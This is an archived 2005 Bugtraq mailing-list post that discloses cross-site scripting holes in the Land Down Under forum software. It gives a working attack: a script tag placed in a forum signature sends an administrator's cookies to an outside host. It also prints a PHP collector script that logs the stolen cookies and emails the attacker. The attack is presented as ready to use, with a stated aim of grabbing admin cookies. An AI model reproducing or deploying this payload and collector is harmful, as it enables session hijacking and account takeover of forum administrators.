Land Down Under
bendeniz_avci_at_hotmail.com
Date: 08/28/05
- Previous message: riklaunim_at_gmail.com: "FUD Forum < 2.7.1 PHP code injection vurnelability"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: 28 Aug 2005 07:55:34 -0000 To: bugtraq@securityfocus.com('binary' encoding is not supported, stored as-is) Bug finder:spyMASter
Web site:Realhackers.net
Contact:bendeniz_avci@hotmail.com
LDU has some xss vulns
Firstly you can use html codes in your signature you can get cookies with this
put your signature that code
<SCRIPT> location.href='http://site.com/log/ekle.php?c='+escape(document. cookie)</SCRIPT>
and post a topic to forum when admin look this topic she/he redirect and you can get cookie
this is codes of ekle.php you can save cookie to a with this php code
<?php
$kayit = fopen("spymaster.txt","a");
foreach($_GET as $variable => $value) {
fwrite($kayit,$variable . ": " . $value . "\n");
}
fwrite($kayit,"---------------------------\n");
fclose($kayit);
mail("bendeniz_avci@hotmail.com","your cookie ready","http://www.realhackers.net/spyoku.txt",'From: spymaster@realhackers.net');
?>
- Previous message: riklaunim_at_gmail.com: "FUD Forum < 2.7.1 PHP code injection vurnelability"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|